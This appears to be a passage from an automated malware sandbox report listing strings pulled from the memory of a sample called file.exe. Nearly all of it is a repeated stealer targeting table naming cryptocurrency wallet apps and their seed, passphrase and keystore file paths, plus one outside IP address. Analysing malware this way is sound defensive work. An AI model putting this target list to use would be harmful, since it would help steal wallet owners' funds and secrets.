Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16bert\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local 